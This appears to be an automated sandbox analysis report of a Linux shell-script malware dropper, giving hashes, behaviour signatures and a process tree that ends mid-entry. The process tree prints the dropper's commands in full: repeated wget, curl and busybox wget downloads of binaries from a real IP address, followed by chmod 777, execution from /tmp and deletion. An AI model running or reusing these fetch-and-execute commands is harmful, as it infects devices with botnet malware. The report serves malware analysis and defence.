Analysis
-
max time kernel
132s -
max time network
136s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:38
Static task
static1
Behavioral task
behavioral1
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
-
Size
10KB
-
MD5
b2db94a95f3a12911c7e79383b2e9f18
-
SHA1
17b862a1f3cda3d5cbfb97bc0bcbd640f72f4fd3
-
SHA256
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c
-
SHA512
3b76d645c8332a5801de9ec5563c4376494571a0736d91e22743912fb8c2b2b3670146be65fa21f4b9a8a080d77960aa2f96e6a437a5f58f219da6c0e23f36c6
-
SSDEEP
192:HfsfQf5fkfMfaLD/WzzdGflUflcflNflQflcflLVzDwrSaqbNhxoZluTFhm9l+I5:/WClO2aLD/WzzdG6mLiKNPZxhxoZluT4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 945 chmod 951 chmod 823 chmod 867 chmod 897 chmod 909 chmod 724 chmod 735 chmod 807 chmod 927 chmod 861 chmod 885 chmod 933 chmod 963 chmod 915 chmod 969 chmod 786 chmod 813 chmod 855 chmod 873 chmod 879 chmod 903 chmod 891 chmod 921 chmod 741 chmod 763 chmod 939 chmod 957 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O 726 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi 736 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 742 XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo 764 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl 788 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt 808 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue 814 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq 824 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z 856 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 862 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 868 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq 874 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y 880 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU 886 454cMOdzouNcZgCP0raVamPmDNLroMiGgU /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 892 XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo 898 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O 904 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi 910 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue 916 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl 922 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt 928 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 934 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 940 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq 946 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq 952 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z 958 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y 964 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU 970 454cMOdzouNcZgCP0raVamPmDNLroMiGgU -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O curl File opened for modification /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU curl File opened for modification /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq curl File opened for modification /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 curl File opened for modification /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl curl File opened for modification /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq curl File opened for modification /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue curl File opened for modification /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 curl File opened for modification /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z curl File opened for modification /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo curl File opened for modification /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 curl File opened for modification /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O curl File opened for modification /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl curl File opened for modification /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU curl File opened for modification /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi curl File opened for modification /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z curl File opened for modification /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt curl File opened for modification /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 curl File opened for modification /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq curl File opened for modification /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt curl File opened for modification /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi curl File opened for modification /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo curl File opened for modification /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y curl File opened for modification /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y curl File opened for modification /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq curl File opened for modification /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 curl File opened for modification /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 curl File opened for modification /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue curl
Processes
-
/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:723
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:734
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:740
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:753
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:783
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:806
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:812
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:820
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:846
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:860
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:866
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:872
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:878
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:884
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:890
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:896
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:902
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:908
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:914
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:920
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:926
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:930
-
-
